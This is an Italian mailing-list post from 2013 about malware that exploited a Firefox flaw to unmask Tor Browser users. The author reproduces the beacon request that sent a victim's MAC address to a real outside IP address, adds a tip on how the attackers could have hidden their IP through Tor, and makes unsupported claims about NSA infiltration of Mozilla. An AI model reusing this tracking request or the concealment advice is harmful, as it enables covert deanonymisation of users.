[e-privacy] Riguardo TorBrowser & Malware

Tramaci.Org epto a tramaci.org
Sab 10 Ago 2013 13:48:09 CEST 

Ho analizzato il codice del malware. Quello che è stato usato funzionava
solo su macchine windows.
Si trattava di una vulnerabilità di firefox che permetteva di eseguire
codice malevolo.
Ciò significa che si può caricare da web del codice macchina ed
eseguirlo all'insaputa dell'utente.
Quindi chiunque su un browser non patchato può eseguire codice di
qualunque tipo. Per esempio
potrebbe installarvi un captatore o accede ad ogni risorsa del sistema.

Sembra che dietro ci sia il solito produttore di malwer tipo NSA FBI e
simili.
Dovrebbero inserirli nella lista dei malware per partito preso di base
"quei due"!

Comuqnue ho fatto una ricerca sulla Mozilla foundation e sugli
sviluppatori, c'è un tizio ex NSA che ci lavora.
Sarebbe interessante che nei codici opensource si facesse un'analisi
delle possibili infiltrazioni delle agenzie di malware.

Io consiglierei di non usare software americano in generale.

Nella versione di torbrowser non dovrebbero copiare il codice di
firefox, forse dovrebbero usare un'altro browser
oppure ispezionare bene il codice rimuovendo alcune features non necessarie.

La domanda è:
Qualcuno ha venduto uno 0 day agli americani per tor?
Scopriamo chi all'interno della Mozilla o quello che è ha scritto la
parte di codice che permette di eseguire
programmi remoti.

Ma rendiamoci conto di una cosa. Perchè usare un browser così lento che
riesce ad occupare gran parte delle
risorse del sistema per vedere pagine web. É come andare a caccia di
mosche con il cannone!

Firefox e mozilla dovrebbero uscire da certi progetti.

Comunque, per la cronaca ècco il codice sorgente del paylod per il
malware su torbrowser.
Sono stati stupidi perchè potevano aggiungere qualche byte per non far
scoprire il loro ip.
Bastava usare la porta di tor su 127.0.0.1 e spedire la richiesta come
socks4a ad un hidden service.
Quindi non son tanto bravi a non farsi scoprire questi del fbi.
Domandiamoci perchè volevano farsi vedere così tanto.

Comunque ricordatevi di mandare a 65.222.202.54 come richiesta http un
cookie con il mac address della vostra scheda di rete.
GET /1f84ae1d-0b15-44dc-9963-8bc971104590 HTTP/1.1
Host: hidden service
Cookie: ID= mac address in esadecimale
Connection: keep-alive
Accept: */*\r\n"
Accept-Encoding: gzip

Maggiori informazioni sulla lista e-privacy